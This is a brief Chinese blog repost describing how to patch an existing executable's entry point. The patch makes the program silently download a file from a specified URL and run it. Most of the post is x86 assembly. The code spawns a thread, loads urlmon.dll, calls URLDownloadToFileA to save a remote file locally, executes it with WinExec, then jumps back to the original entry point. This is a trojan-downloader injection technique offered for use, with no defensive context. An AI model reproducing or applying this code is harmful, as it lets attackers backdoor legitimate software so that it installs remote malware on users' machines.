通过修改程序的代码使程序能够下载并运行指定程序

转载 于 2007-09-25 11:29:00 发布 · 1.3k 阅读 · 1
文章标签:

#c

本文介绍了一种利用多线程技术从远程下载指定文件,并将其保存到本地指定路径的方法。具体步骤包括调用LoadLibraryA和GetProcAddress来加载DLL文件及获取导出函数地址,之后使用WinExec执行下载的文件。
相关代码如下:
  原入口:
  jmp  xxxxxxxx    代码段②开始的位置
  ①:
  pushad
  push xxxxxxxx    字符串urlmon.dll的位置
  call kernel32.LoadLibraryA
  push xxxxxxxx    字符串URLDownloadToFileA的位置
  push eax
  call kernel32.GetProcAddress
  push 0
  push 0
  push xxxxxxxx    存放位置,如:c://1.exe
  push xxxxxxxx    下载位置
  push 0
  call eax
  push 0
  push xxxxxxxx    存放位置
  call kernel32.WinExec
  popad
  retn


  ②:
  pushad
  push 0
  push 0
  push xxxxxxxx    代码①开始的位置
  call msvcrt._beginthread
  jmp xxxxxxxx     原入口的位置
 
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值